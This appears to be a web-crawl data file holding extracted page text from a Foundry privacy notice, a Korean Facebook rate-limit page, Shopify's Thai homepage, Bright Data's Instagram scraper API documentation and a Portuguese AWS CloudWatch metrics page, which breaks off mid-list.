to, if requested information is necessary for Foundry to comply with legal obligations, exercise legal claims or rights, or defend legal claims; and/or the information is publicly available information, medical information, consumer credit information or any other type of information exempt from the CCPA. Updates to this notice We reserve the right to amend this notice from time to time as necessary. We will post a notice on this website if there are material changes to this policy, but you should also check this website periodically to review the current policy. An updated version of this notice will be published on our website. This notice was last updated in September 2025. Our brands Solutions Research Resources Events About Newsletter Contact us Work here Sitemap Topics Cookies: First-party & third-party Generative AI sponsorships Intent data IP address intelligence Reverse IP lookup Website visitor tracking Legal Terms of Service Privacy / Compliance Environmental Policy Copyright Notice Licensing CCPA IAB Europe TCF Regions ASEAN Australia & New Zealand Central Europe Germany India Middle East, Turkey, & Africa Nordics Southern Europe Western Europe Facebook Twitter LinkedIn ©2026 FoundryCo, Inc. All Rights Reserved. Privacy Policy Ad Choices Privacy Settings California: Do Not Sell My Information | 2026-01-13T09:29:26 |
https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&h=AT1SGNe_gcy7WQ-HciTkb3G6F88utfhXA0Vppvul-_gMd-QiCuGDYJh0WioSDSbqDDXFYUmIR_utlvqyx3yJXFCqXizo5ydc_tfYG2min9JRrY936jNHf0pf7Zzbc5KMVMuJrODgQBrh2xKN | Facebook Facebook 이메일 또는 휴대폰 비밀번호 계정을 잊으셨나요? 새 계정 만들기 일시적으로 차단됨 일시적으로 차단됨 회원님의 이 기능 사용 속도가 너무 빠른 것 같습니다. 이 기능 사용에서 일시적으로 차단되었습니다. Back 한국어 English (US) Tiếng Việt Bahasa Indonesia ภาษาไทย Español 中文(简体) 日本語 Português (Brasil) Français (France) Deutsch 가입하기 로그인 Messenger Facebook Lite 동영상 Meta Pay Meta 스토어 Meta Quest Ray-Ban Meta Meta AI Meta AI 콘텐츠 더 보기 Instagram Threads 투표 정보 센터 개인정보처리방침 개인정보 보호 센터 정보 광고 만들기 페이지 만들기 개발자 채용 정보 쿠키 AdChoices 이용 약관 고객 센터 연락처 업로드 및 비사용자 설정 활동 로그 Meta © 2026 | 2026-01-13T09:29:26 |
https://www.shopify.com/th | Shopify ไทย ข้ามไปที่เนื้อหา โซลูชัน เริ่ม เริ่มต้นธุรกิจของคุณ . สร้างแบรนด์ของคุณ สร้างเว็บไซต์ของคุณ . เครื่องมือแก้ไขร้านค้าออนไลน์ ปรับแต่งร้านค้าของคุณ . ธีมร้านค้า ค้นหาแอปธุรกิจ . Shopify App Store ขาย ขายผลิตภัณฑ์ของคุณ . ขายออนไลน์หรือขายด้วยตนเอง รับการชำระเงินจากลูกค้า . ระบบการชำระเงินระดับโลก ขายออนไลน์ . ขยายธุรกิจของคุณทางออนไลน์ ขายผ่านช่องทางต่างๆ . เข้าถึงนักช้อปหลายล้านคนและเพิ่มยอดขาย ขายไปทั่วโลก . การขายระหว่างประเทศ ขายส่งและขายตรง . ธุรกิจกับธุรกิจ (B2B) ตลาด ทำการตลาดให้ธุรกิจของคุณ . เข้าถึงและรักษาลูกค้า ทำการตลาดในโลกโซเชียล . การผสานรวมกับโซเชียลมีเดีย ดูแลลูกค้า . Shopify Email รู้จักกลุ่มเป้าหมายของคุณ . รับข้อมูลเชิงลึกเกี่ยวกับลูกค้า จัดการ จัดการธุรกิจของคุณ . ติดตามการขาย คำสั่งซื้อ และการวิเคราะห์ วัดผลประสิทธิภาพของคุณ . การวิเคราะห์และการรายงาน จัดการสต็อกสินค้าและคำสั่งซื้อ . การจัดการสินค้าคงคลังและคำสั่งซื้อ ผู้พัฒนา Shopify . สร้างด้วย API อันทรงพลังของ Shopify Plus . โซลูชันการค้าสำหรับแบรนด์ดิจิทัลที่กำลังเติบโต สินค้าทั้งหมด . สำรวจผลิตภัณฑ์และฟีเจอร์ของ Shopify ทั้งหมด การกำหนดราคา แหล่งข้อมูล ความช่วยเหลือและการสนับสนุน ความช่วยเหลือและการสนับสนุน . รับความช่วยเหลือตลอด 24 ชั่วโมงทุกวัน บล็อก Shopify . เคล็ดลับกลยุทธ์เชิงธุรกิจ เครื่องมือที่จำเป็น ตัวสร้างชื่อธุรกิจ . ตัวสร้างโลโก้ . ภาพสต็อก . ตัวสร้างรหัส QR . เข้าสู่ระบบ ทดลองใช้ฟรี ทดลองใช้ฟรี ให้ธุรกิจของคุณ เติบโตก้าวกระโดด ให้ธุรกิจของคุณ เป็นร้านที่ทุกคนต้องมาเข้าคิวรอซื้อ เติบโตก้าวกระโดด น่าจับตามอง เป็นผู้เปิดตลาดใหม่ เป็นสตาร์ทอัพสุดปัง ที่ใครๆ ก็ต้องรู้จัก โด่งดังทั่วโลก ฉายเดี่ยวในวงการ เป็นร้านที่ทุกคนต้องมาเข้าคิวรอซื้อ ฝันให้ไกล สร้างได้รวดเร็ว และเติบโตแบบก้าวกระโดดไปกับ Shopify ทดลองใช้ฟรี เหตุผลที่เราสร้าง Shopify แพลตฟอร์มพาณิชย์หนึ่งเดียวที่อยู่เบื้องหลังทุกความสำเร็จ ขายทั้งทางออนไลน์และหน้าร้าน ขายทั้งในประเทศและต่างประเทศ ขายตรงและขายส่ง ขายบนเดสก์ท็อปและอุปกรณ์มือถือ glossier.com thesill.com vacation.inc aurabora.com kitandace.com supersmalls.com happymondaycoffee.com onlyny.com jp.bonaventura.shop rowingblazers.com kirrinfinch.com brooklinen.com shop.a-morir.com carawayhome.com thirstyturtl.com สำหรับทุกคน ไม่ว่าจะเป็นผู้ประกอบการขนาดเล็กหรือกิจการขนาดใหญ่ ผู้ขายหลายล้านรายจากธุรกิจทุกขนาดสร้างยอดขายบน Shopify รวมกันได้มากกว่า 1 ล้านล้าน USD เริ่มต้นได้รวดเร็ว ผู้ขายที่ดำเนินการคนเดียวอย่าง Megan Bre Camp เริ่มต้น Summer Solace Tallow เพื่อขายเทียนและผลิตภัณฑ์ดูแลผิวออร์แกนิกของเธอทางออนไลน์และที่ตลาดเกษตรกรในพื้นที่ ทำธุรกิจให้โตเท่าที่คุณใฝ่ฝัน Gymshark เป็นแบรนด์เสื้อผ้าออกกำลังกายกึ่งชุดลำลองที่เติบโตจากการทำงานในโรงรถจนกลายมาเป็นแบรนด์ดังระดับโลกในปัจจุบัน ด้วยยอดขายมากกว่า 500 ล้าน USD ต่อปี ยกระดับมาตรฐาน ด้วยความช่วยเหลือจาก Shopify สำหรับองค์กร Mattel จึงสามารถจำหน่ายของเล่นที่เป็นเอกลักษณ์ของร้านโดยตรงให้กับลูกค้าทั่วโลก เลือกแผนที่เหมาะสม ออนไลน์และหน้าร้าน ขายได้ในทุกที่ มีร้านค้าที่สวยงาม ที่สร้างขึ้นเพื่อการขาย ออกแบบอย่างรวดเร็วด้วย AI, เลือกธีมที่มีสไตล์ หรือสร้างเองทั้งหมดเพื่อการควบคุมเต็มรูปแบบ ระบบขายหน้าร้าน ขายสินค้าหน้าร้านและซิงค์ยอดขายออฟไลน์และออนไลน์ด้วย Shopify POS เผยแพร่ผ่านช่องทางต่างๆ ด้วย การผสานการทำงานหลายช่องทาง ร้านค้าของคุณจะหาพบได้ง่ายๆ เมื่อนักช้อปเลื่อนดู ค้นหา และเลือกซื้อสินค้า ขับเคลื่อนด้วยระบบการชำระเงินที่ดีที่สุดในโลก Shopify Checkout รวดเร็ว ปรับแต่งได้เต็มที่ และออกแบบมาคุณให้ปิดการขายได้มากขึ้นโดยเฉพาะ ขายตรงและขายส่ง ค้นหาลูกค้าประจำของคุณ เข้าถึงลูกค้าที่เหมาะสมด้วยต้นทุนที่น้อยลง หาลูกค้าใหม่ๆ และดึงดูดให้ลูกค้ากลับมาซื้อเป็นประจำด้วย เครื่องมือการตลาดแบบผสานรวม และ การวิเคราะห์เชิงลึก ปลดล็อกการเติบโตครั้งใหม่ด้วย B2B สร้าง ประสบการณ์การใช้งานแบบกำหนดเองสำหรับผู้ซื้อในการค้าส่ง ด้วยราคา ส่วนลด และเงื่อนไขการชำระเงินที่ยืดหยุ่น ระดับประเทศและระดับโลก เติบโตไปทั่วโลก Buy now 🇺🇸 คำสั่งซื้อสำหรับ US$40.00 Buy now 🇺🇸 คำสั่งซื้อสำหรับ US$125.00 Buy now 🇺🇸 คำสั่งซื้อสำหรับ US$125.00 Buy now 🇺🇸 คำสั่งซื้อสำหรับ US$125.00 Buy now 🇺🇸 คำสั่งซื้อสำหรับ US$125.00 Buy now 🇺🇸 คำสั่งซื้อสำหรับ US$125.00 ขายและจัดส่งไปทุกที่ Shopify ช่วยขจัดความซับซ้อนในการขายระหว่างประเทศ ตั้งแต่การจัดส่งสินค้าที่รวดเร็วและประหยัดมากขึ้น ไปจนถึงการปรับประสบการณ์การใช้งานของคุณให้เข้ากับพื้นที่ด้วย Shopify Markets เดสก์ท็อปและอุปกรณ์มือถือ ดูแลธุรกิจ จัดการทุกอย่างในที่เดียว ให้คุณดูแลจัดการได้ตั้งแต่สำนักงานส่วนหลังไปจนถึงหน้าร้าน ด้วย Shopify Admin ที่สามารถจัดการทุกสิ่งได้จากที่เดียว บริหารจัดการร้านค้าของคุณได้จากทุกที่ จัดการทุกอย่างได้ง่ายเพียงปลายนิ้วด้วย แอป Shopify บนอุปกรณ์มือถือ ที่มีฟีเจอร์ครบครัน แอปสำหรับสิ่งอื่นๆ Shopify มอบบริการที่จำเป็นให้ทั้งหมดแบบสำเร็จรูป แต่หากธุรกิจของคุณต้องการฟีเจอร์ที่มากกว่า คุณสามารถเลือกใช้ Shopify App Store ซึ่งมีแอปอีคอมเมิร์ซมากกว่า 13,000 แอปที่มีฟีเจอร์เฉพาะตามที่คุณอาจต้องการ สร้างสรรค์โดยนักพัฒนา เพื่อนักพัฒนา API, ฟังก์ชันพื้นฐาน และเครื่องมือต่างๆ ช่วยให้นักพัฒนาและ พาร์ทเนอร์ สามารถสร้างแอป ธีม และหน้าร้านแบบกำหนดเองที่ธุรกิจต่างๆ กำลังมองหา Hydrogen: เฟรมเวิร์กการค้าแบบไร้ส่วนหัวของ Shopify สร้างหน้าร้านแบบกำหนดเอง ปรับขยายการชำระเงิน สร้างแอป shopify.dev เพื่อการสร้างร้านค้าที่ดีที่สุดสำหรับคุณ บริการชำระเงินที่สร้างคอนเวอร์ชันที่ดีที่สุดในโลก คอนเวอร์ชันสูงกว่า 15 % นักช้อปที่มีความต้องการซื้อสูง 150 ล้าน + Shopify Checkout มีอัตราคอนเวอร์ชันสูงกว่าแพลตฟอร์มพาณิชย์อื่นโดยเฉลี่ย 15% และช่วยให้นักช้อปที่พร้อมใช้จ่ายกว่า 150 ล้านคนสามารถค้นเจอแบรนด์ของคุณได้ง่าย อิงจากการศึกษาภายนอกที่ดำเนินการร่วมกับบริษัทที่ปรึกษาระดับโลกอย่าง Big Three ในเดือนเมษายน 2023 มั่นใจในเสถียรภาพและรวดเร็วทันใจ Shopify ช่วยให้นักช้อปทั่วโลกเข้าถึงร้านค้าของคุณได้ใน 50 มิลลิวินาที พร้อมความสามารถในการจัดการที่รองรับแม้กระทั่งการเปิดตัวสินค้าแบบจำกัดที่ยิ่งใหญ่ที่สุด Shopify สร้างสรรค์นวัตกรรมอย่างไม่หยุดนิ่ง ทีมงานนักพัฒนาซอฟต์แวร์ระดับโลกมากกว่า 4,000 คนของเราไม่เคยหยุดใช้ประโยชน์จากเทคโนโลยีล่าสุดเพื่อให้ธุรกิจของคุณมั่นคงขึ้น รวดเร็วยิ่งขึ้น และประสบความสำเร็จมากขึ้น การออกแบบด้วย AI เพื่ออีคอมเมิร์ซ Shopify Magic ใช้ความสามารถของ AI เพื่อช่วยคุณประหยัดเวลา ไม่ว่าจะเป็นการสร้างเนื้อหาสำหรับสินค้าหรือแนะนำวิธีการใช้ประโยชน์สูงสุดจาก Shopify นวัตกรรมที่ไม่หยุดนิ่ง ทุกๆ 6 เดือน Shopify จะเปิดตัวฟีเจอร์และการอัปเกรดใหม่ๆ มากกว่า 150 รายการ ซึ่งทั้งหมดจะปรากฏอยู่ใน Shopify Editions เริ่มต้นขายได้อย่างง่ายดาย 01 เพิ่มสินค้ารายการแรกของคุณ 02 ปรับแต่งร้านค้าของคุณ 03 ตั้งค่าการชำระเงิน คว้าโอกาสของคุณเลย Shopify เกี่ยวกับ รับสมัครงาน นักลงทุน ข่าวสารและสื่อ พาร์ทเนอร์ ตัวแทนโฆษณาสินค้าและบริการ กฎหมาย สถานะบริการ ความช่วยเหลือ การสนับสนุนผู้ขาย ศูนย์ช่วยเหลือของ Shopify จ้างพาร์ทเนอร์ Shopify Academy ผู้พัฒนา Shopify.dev เอกสาร API Dev Degree สินค้า ร้านค้า Shop Pay Shopify Plus Shopify สำหรับองค์กร โซลูชัน ตัวสร้างร้านค้าออนไลน์ เครื่องมือสร้างเว็บไซต์ ไทย | ไทย กรีซ Greek | English เกาหลี 한국어 | English เขตบริหารพิเศษฮ่องกง 繁體中文 | English แคนาดา English | Français โคลัมเบีย Español | English ชิลี Español | English ญี่ปุ่น 日本語 เดนมาร์ก Dansk | English ตุรกี Türkçe | English ไต้หวัน 繁體中文 | English ไทย ไทย | English นอร์เวย์ Norge | English นิวซีแลนด์ English เนเธอร์แลนด์ Nederlands | English ไนจีเรีย English บราซิล Português | English บัลแกเรีย Bulgarian | English เบลเยียม Nederlands | German | Français | English เบลารุส Russian | English ปากีสถาน English เปรู Español | English โปรตุเกส Português | English โปแลนด์ Polski | English ฝรั่งเศส Français | English ฟินแลนด์ Suomi | English ฟิลิปปินส์ English มาเลเซีย English เม็กซิโก Español | English เยอรมนี Deutsch | English โรมาเนีย Romanian | English ลิทัวเนีย Lithuanian | English สเปน Español | English สวิตเซอร์แลนด์ Deutsch | Français | Italiano | English สวีเดน Svenska | English สหรัฐอเมริกา English | Español (Intl.) | 简体中文 สหรัฐอาหรับเอมิเรตส์ English สหราชอาณาจักร English สาธารณรัฐเช็ก Čeština | English สิงคโปร์ English ออสเตรเลีย English ออสเตรีย Deutsch | English อาร์เจนตินา Español | English อิตาลี Italiano | English อินเดีย Hindi | English อินโดนีเซีย Indonesian | English อิสราเอล English แอฟริกาใต้ English ไอร์แลนด์ English ฮังการี Hungarian | English ไทย | ไทย เลือกภูมิภาคและภาษา กรีซ Greek | English เกาหลี 한국어 | English เขตบริหารพิเศษฮ่องกง 繁體中文 | English แคนาดา English | Français โคลัมเบีย Español | English ชิลี Español | English ญี่ปุ่น 日本語 เดนมาร์ก Dansk | English ตุรกี Türkçe | English ไต้หวัน 繁體中文 | English ไทย ไทย | English นอร์เวย์ Norge | English นิวซีแลนด์ English เนเธอร์แลนด์ Nederlands | English ไนจีเรีย English บราซิล Português | English บัลแกเรีย Bulgarian | English เบลเยียม Nederlands | German | Français | English เบลารุส Russian | English ปากีสถาน English เปรู Español | English โปรตุเกส Português | English โปแลนด์ Polski | English ฝรั่งเศส Français | English ฟินแลนด์ Suomi | English ฟิลิปปินส์ English มาเลเซีย English เม็กซิโก Español | English เยอรมนี Deutsch | English โรมาเนีย Romanian | English ลิทัวเนีย Lithuanian | English สเปน Español | English สวิตเซอร์แลนด์ Deutsch | Français | Italiano | English สวีเดน Svenska | English สหรัฐอเมริกา English | Español (Intl.) | 简体中文 สหรัฐอาหรับเอมิเรตส์ English สหราชอาณาจักร English สาธารณรัฐเช็ก Čeština | English สิงคโปร์ English ออสเตรเลีย English ออสเตรีย Deutsch | English อาร์เจนตินา Español | English อิตาลี Italiano | English อินเดีย Hindi | English อินโดนีเซีย Indonesian | English อิสราเอล English แอฟริกาใต้ English ไอร์แลนด์ English ฮังการี Hungarian | English ข้อกำหนดในการใช้บริการ นโยบายความเป็นส่วนตัว แผนผังเว็บไซต์ | 2026-01-13T09:29:26 |
https://docs.brightdata.com/api-reference/web-scraper-api/social-media-apis/instagram#param-start-date-1 | Instagram API Scrapers - Bright Data Docs Skip to main content Bright Data Docs home page English Search... ⌘ K Support Sign up Sign up Search... Navigation Social Media APIs Instagram API Scrapers Welcome Proxy Infrastructure Web Access APIs Data Feeds AI API Reference General Integrations Overview Authentication Terminology Postman collection Python SDK JavaScript SDK Products Unlocker API SERP API Marketplace Dataset API Web Scraper API POST Asynchronous Requests POST Synchronous Requests POST Crawl API Delivery APIs Management APIs Social Media APIs Overview Facebook Instagram LinkedIn TikTok Reddit Twitter Pinterest Quora Vimeo YouTube Scraper Studio API Scraping Shield Proxy Networks Proxy Manager Unlocker & SERP API Deep Lookup API (Beta) Administrative API Account Management API On this page Overview Profiles API Collect by URL Posts API Collect by URL Discover by URL Comments API Collect by URL Reels API Collect by URL Discover by URL Social Media APIs Instagram API Scrapers Copy page Copy page Overview The Instagram API Suite offers multiple types of APIs, each designed for specific data collection needs from Instagram. Below is an overview of how these APIs connect and interact, based on the available features: Profiles API This API allows users to collect profile details based on a single input: profile URL. Discovery functionality : N/A Interesting Columns : followers , post_count , post_hashtags , profile_name . Posts API This API allows users to collect multiple posts based on a single input URL (such as an Instagram reels URL, search URL or profile URL). Discovery functionality : - Direct URL of the Instagram reel - Direct URL of the search - Direct URL of the profile Interesting Columns : url , followers , hashtags , engagement_score_view . Comments API This API allows users to collect multiple comments from a post using its URL. Discovery functionality : N/A Interesting Columns : comment_user , comment , likes_number , replies_number . The suite of APIs is designed to offer flexibility for targeted data collection, where users can input specific URLs to gather detailed post and comment data, either in bulk or with precise filtering options. Profiles API Collect by URL This API allows users to collect detailed data about an Instagram profile by providing the profile URL. It provides a comprehensive overview of an Instagram profile, including business and engagement information, posts, and user details. Input Parameters URL string required The Instagram profile URL. Output Structure Includes comprehensive data points: Page/Profile Details : account , id , followers , posts_count , is_business_account , is_professional_account , is_verified , avg_engagement , profile_name , profile_url , profile_image_link , and more. For all data points, click here . Posts API Collect by URL This API enables users to collect detailed data from Instagram posts by providing a post URL. Input Parameters URL string required The Instagram post URL. Output Structure Includes comprehensive data points: Post Details : post_id , description , hashtags , date_posted , num_comments , likes , content_type , video_view_count , video_play_count , and more. For all data points, click here . Page/Profile Details : user_posted , followers , posts_count , profile_image_link , is_verified , profile_url . We provide a limited set of data points about the profile. Attachments and Media : photos , videos , thumbnail , display_url (link only, not the file itself), audio. Discover by URL This API allows users to discover recent Instagram posts from a public profile by providing the profile URL and specifying additional parameters. Input Parameters URL string required The Instagram profile URL. num_of_posts number The number of recent posts to collect. If omitted, there is no limit. posts_to_not_include array Array of post IDs to exclude from the results. start_date string Start date for filtering posts in MM-DD-YYYY format (should be earlier than end_date). end_date string End date for filtering posts in MM-DD-YYYY format (should be later than start_date). post_type string Specify the type of posts to collect (e.g., post, reel). Output Structure Includes comprehensive data points: Post Details: post_id , description , hashtags , date_posted , num_comments , likes , video_view_count , video_play_count ,and more. For all data points, click here . Page/Profile Details: user_posted , followers , posts_count , profile_image_link , is_verified , profile_url , is_paid_partnership , partnership_details , user_posted_id Attachments and Media: photos , videos , thumbnail , audio , display_url , content_type , product_type , coauthor_producers , tagged_users . This API is designed to allow for filtering, exclusion of specific posts, and collecting posts by type (regular post or reel) within a defined time frame. It provides detailed post and profile information, making it ideal for data collection and analytics. Comments API Collect by URL This API allows users to collect the latest comments from a specific Instagram post by providing the post URL. This API retrieves the most recent 10 comments along with associated metadata. Input Parameters URL string required The Instagram post URL. Output Structure Includes comprehensive data points: Comment Details : comment_id , comment_user , comment_user_url , comment_date , comment , likes_number , replies_number , replies , hashtag_comment , tagged_users_in_comment , and more. For all data points, click here . User Details : user_name , user_id , user_url We provide a limited set of data points about the profile. Post Metadata : post_url , post_user , post_id . Reels API Collect by URL This API allows users to collect detailed data about Instagram reels from public profiles by providing the reel URL. Input Parameters URL string required The Instagram reel URL. Output Structure Includes comprehensive data points: Reel Details : post_id , description , hashtags , date_posted , tagged_users , num_comments , likes , views , video_play_count , length , and more. For all data points, click here . Page/Profile Details : user_posted , followers , posts_count , profile_image_link , is_verified , profile_url . We provide a limited set of data points about the profile. Attachments and Media : video_url , thumbnail , audio_url . Discover by URL This API allows users to discover Instagram Reels videos from a profile URL or direct search URL. Input Parameters URL string required The Instagram profile or direct search URL. num_of_posts number The number of recent reels to collect. If omitted, there is no limit. posts_to_not_include array Array of post IDs to exclude from the results. start_date string Start date for filtering reels in MM-DD-YYYY format. end_date string End date for filtering reels in MM-DD-YYYY format (should be later than start_date ). Output Structure Includes comprehensive data points: Reel Details : post_id , description , hashtags , date_posted , num_comments , likes , views , video_play_count , top_comments , length , video_url , audio_url , content_id , and more. For all data points, click here . Profile Details : user_posted , followers , posts_count , following . Attachments and Media : video_url , thumbnail , audio_url (link only, not the file itself). This API provides detailed information about Instagram Reels, with filtering options by date range, exclusion of specific posts, and a limit on the number of reels collected. Was this page helpful? Yes No Facebook LinkedIn ⌘ I linkedin youtube github Powered by | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/pt_br/AmazonCloudWatch/latest/monitoring/metrics-collected-by-CloudWatch-agent.html#windows-metrics-enabled-by-CloudWatch-agent | Métricas coletadas pelo atendente do CloudWatch - Amazon CloudWatch Métricas coletadas pelo atendente do CloudWatch - Amazon CloudWatch Documentação Amazon CloudWatch Guia do usuário Métricas coletadas pelo atendente do CloudWatch em instâncias do Windows Server Métricas coletadas pelo atendente do CloudWatch em instâncias do Linux e macOS Definições de métricas de memória Métricas coletadas pelo atendente do CloudWatch É possível coletar métricas de servidores instalando o atendente do CloudWatch no servidor. É possível instalar o agente tanto em instâncias do Amazon EC2 quanto em servidores on-premises. Você também pode instalar o agente em computadores que executam Linux, Windows Server ou macOS. Se você instalar o agente em uma instância do Amazon EC2, as métricas coletadas pelo agente serão adicionais às métricas habilitadas por padrão nas instâncias do Amazon EC2. Para obter informações sobre como instalar o atendente do CloudWatch em uma instância, consulte Coleta de métricas, logs e rastreamentos usando o agente do CloudWatch . Você pode usar esta seção para saber mais informações sobre as métricas que são coletadas pelo agente do CloudWatch. Métricas coletadas pelo atendente do CloudWatch em instâncias do Windows Server Em um servidor que execute o Windows Server, instalar o atendente do CloudWatch permite coletar as métricas associadas ao contadores no Monitor de Performance do Windows. Os nomes de métrica do CloudWatch para esses contadores são criados colocando um espaço entre o nome do objeto e o nome do contador. Por exemplo, o contador % Interrupt Time do objeto Processor recebe o nome da métrica Processor % Interrupt Time no CloudWatch. Para obter mais informações sobre os contadores do Monitor de Performance do Windows, consulte a documentação do Microsoft Windows Server. O namespace padrão para métricas coletadas pelo atendente do CloudWatch é CWAgent , embora seja possível especificar um namespace diferente quando você configura o atendente. Métricas coletadas pelo atendente do CloudWatch em instâncias do Linux e macOS A tabela a seguir relaciona as métricas coletadas pelo atendente do CloudWatch em servidores Linux e computadores macOS. Métrica Descrição cpu_time_active A quantidade de tempo que a CPU está ativa em qualquer capacidade. Essa métrica é medida em centésimos de segundo. Unidade: nenhuma cpu_time_guest A quantidade de tempo em que a CPU está executando uma CPU virtual para um sistema operacional convidado. Essa métrica é medida em centésimos de segundo. Unidade: nenhuma cpu_time_guest_nice O tempo em que a CPU está executando uma CPU virtual para um sistema operacional convidado, que é de baixa prioridade e pode ser interrompida por outros processos. Essa métrica é medida em centésimos de segundo. Unidade: nenhuma cpu_time_idle A quantidade de tempo em que a CPU está ociosa. Essa métrica é medida em centésimos de segundo. Unidade: nenhuma cpu_time_iowait A quantidade de tempo em que a CPU está aguardando a conclusão de operações de entrada/saída. Essa métrica é medida em centésimos de segundo. Unidade: nenhuma cpu_time_irq A quantidade de tempo em que a CPU está atendendo a interrupções. Essa métrica é medida em centésimos de segundo. Unidade: nenhuma cpu_time_nice O tempo em que a CPU permanece em modo de usuário com processos de baixa prioridade que podem ser facilmente interrompidos por processos de prioridade mais alta. Essa métrica é medida em centésimos de segundo. Unidade: nenhuma cpu_time_softirq A quantidade de tempo em que a CPU está atendendo a interrupções de software. Essa métrica é medida em centésimos de segundo. Unidade: nenhuma cpu_time_steal A quantidade de tempo em que a CPU está no tempo roubado , que é o tempo gasto em outros sistemas operacionais em um ambiente virtualizado. Essa métrica é medida em centésimos de segundo. Unidade: nenhuma cpu_time_system A quantidade de tempo em que a CPU está no modo de sistema. Essa métrica é medida em centésimos de segundo. Unidade: nenhuma cpu_time_user A quantidade de tempo em que a CPU está no modo de usuário. Essa métrica é medida em centésimos de segundo. Unidade: nenhuma cpu_usage_active A porcentagem de tempo que a CPU está ativa em qualquer capacidade. Unidade: Percentual cpu_usage_guest O percentual de tempo que a CPU está executando uma CPU virtual para um sistema operacional convidado. Unidade: Percentual cpu_usage_guest_nice A porcentagem de tempo em que a CPU está executando uma CPU virtual para um sistema operacional convidado que é de baixa prioridade e pode ser interrompida por outros processos. Unidade: Percentual cpu_usage_idle O percentual de tempo em que a CPU está ociosa. Unidade: Percentual cpu_usage_iowait O percentual de tempo que a CPU está aguardando a conclusão de operações de entrada/saída. Unidade: Percentual cpu_usage_irq O percentual de tempo que a CPU está atendendo a interrupções. Unidade: Percentual cpu_usage_nice A porcentagem de tempo que a CPU está em modo de usuário com processos de baixa prioridade que podem ser facilmente interrompidos por processos de prioridade mais alta. Unidade: Percentual cpu_usage_softirq O percentual de tempo que a CPU está atendendo a interrupções de software. Unidade: Percentual cpu_usage_steal O percentual de tempo que a CPU está no tempo roubado , ou o tempo gasto em outros sistemas operacionais em um ambiente virtualizado. Unidade: Percentual cpu_usage_system O percentual de tempo que a CPU está no modo de sistema. Unidade: Percentual cpu_usage_user O percentual de tempo que a CPU está no modo de usuário. Unidade: Percentual disk_free O espaço livre nos discos. Unidade: bytes disk_inodes_free O número de nós de índice disponíveis no disco. Unidade: Contagem disk_inodes_total O número total de nós de índice reservados no disco. Unidade: Contagem disk_inodes_used O número de nós de índice usados no disco. Unidade: Contagem disk_total Total de espaço nos discos, incluindo usado e gratuito. Unidade: bytes disk_used O espaço usado nos discos. Unidade: bytes disk_used_percent O percentual do total de espaço em disco que é usado. Unidade: Percentual diskio_iops_in_progress O número de solicitações de E/S que foram emitidas para o driver de dispositivo, mas ainda não foram concluídas. Unidade: Contagem diskio_io_time A quantidade de tempo que o disco tem solicitações de E/S na fila. Unidade: milissegundos A única estatística que deve ser usada para essa métrica é Sum . Não use Average . diskio_reads O número de operações de leitura de disco. Unidade: Contagem A única estatística que deve ser usada para essa métrica é Sum . Não use Average . diskio_read_bytes O número de bytes lidos dos discos. Unidade: bytes A única estatística que deve ser usada para essa métrica é Sum . Não use Average . diskio_read_time A quantidade de tempo que solicitações de leitura aguardaram nos discos. Várias solicitações de leitura em espera ao mesmo tempo que aumentam em número. Por exemplo, se 5 solicitações aguardarem uma média de 100 milissegundos, 500 serão relatadas. Unidade: milissegundos A única estatística que deve ser usada para essa métrica é Sum . Não use Average . diskio_writes O número de operações de gravação de disco. Unidade: Contagem A única estatística que deve ser usada para essa métrica é Sum . Não use Average . diskio_write_bytes O número de bytes gravados nos discos. Unidade: bytes A única estatística que deve ser usada para essa métrica é Sum . Não use Average . diskio_write_time A quantidade de tempo que solicitações de gravação aguardaram nos discos. Várias solicitações de gravação em espera ao mesmo tempo que aumentam em número. Por exemplo, se 8 solicitações aguardarem uma média de 1000 milissegundos, 8000 serão relatadas. Unidade: milissegundos A única estatística que deve ser usada para essa métrica é Sum . Não use Average . ethtool_bw_in_allowance_exceeded O número de pacotes que foram colocados em fila e/ou descartados devido ao fato de que a largura de banda de entrada agregada excedeu o limite máximo para a instância. Essa métrica será coletada somente se você listá-la na subseção ethtool da seção metrics_collected do arquivo de configuração do atendente do CloudWatch. Para mais informações, consulte Coletar métricas de performance da rede Unidade: nenhuma ethtool_bw_out_allowance_exceeded Número de pacotes na fila e/ou descartados porque a largura de banda agregada de saída excedeu o máximo para a instância. Essa métrica será coletada somente se você listá-la na subseção ethtool da seção metrics_collected do arquivo de configuração do atendente do CloudWatch. Para mais informações, consulte Coletar métricas de performance da rede Unidade: nenhuma ethtool_conntrack_allowance_exceeded Número de pacotes descartados porque o monitoramento da conexão excedeu o máximo para a instância e não foi possível estabelecer novas conexões. Isso pode resultar em perda de pacotes para tráfego indo para a instância ou vindo da instância Essa métrica será coletada somente se você listá-la na subseção ethtool da seção metrics_collected do arquivo de configuração do atendente do CloudWatch. Para mais informações, consulte Coletar métricas de performance da rede Unidade: nenhuma ethtool_linklocal_allowance_exceeded Número de pacotes descartados porque o PPS do tráfego para os serviços de proxy local excedeu o máximo para a interface da rede. Isso afeta o tráfego para o serviço de DNS, o Instance Metadata Service e o Amazon Time Sync Service. Essa métrica será coletada somente se você listá-la na subseção ethtool da seção metrics_collected do arquivo de configuração do atendente do CloudWatch. Para mais informações, consulte Coletar métricas de performance da rede Unidade: nenhuma ethtool_pps_allowance_exceeded Número de pacotes na fila e/ou descartados porque o PPS bidirecional excedeu o máximo para a instância. Essa métrica será coletada somente se você listá-la na subseção ethtool da seção metrics_collected do arquivo de configuração do atendente do CloudWatch. Para obter mais informações, consulte Coletar métricas de performance da rede . Unidade: nenhuma mem_active A quantidade de memória que foi usada de alguma maneira durante o último período de amostra. Unidade: bytes mem_available A quantidade de memória que está disponível e pode ser fornecida instantaneamente para os processos. Unidade: bytes mem_available_percent O percentual de memória que está disponível e pode ser fornecido instantaneamente para os processos. Unidade: Percentual mem_buffered A quantidade de memória que está sendo usada para buffers. Unidade: bytes mem_cached A quantidade de memória que está sendo usada para caches de arquivo. Unidade: bytes mem_free A quantidade de memória que não está sendo usada. Unidade: bytes mem_inactive A quantidade de memória que não foi usada de alguma maneira durante o último período de amostra Unidade: bytes mem_total A quantidade total de memória. Unidade: bytes mem_used A quantidade de memória em uso no momento. Unidade: bytes mem_used_percent O percentual de memória em uso no momento. Unidade: Percentual net_bytes_recv O número de bytes recebidos pela interface de rede. Unidade: bytes A única estatística que deve ser usada para essa métrica é Sum . Não use Average . net_bytes_sent O número de bytes enviados pela interface de rede. Unidade: bytes A única estatística que deve ser usada para essa métrica é Sum . Não use Average . net_drop_in O número de pacotes recebidos por essa interface de rede que foram descartados. Unidade: Contagem A única estatística que deve ser usada para 